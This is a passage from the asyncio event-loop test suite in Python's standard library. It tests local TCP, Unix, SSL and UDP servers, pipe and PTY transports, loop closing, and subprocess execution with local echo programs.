client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
@unittest.skipUnderUwsgi()
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
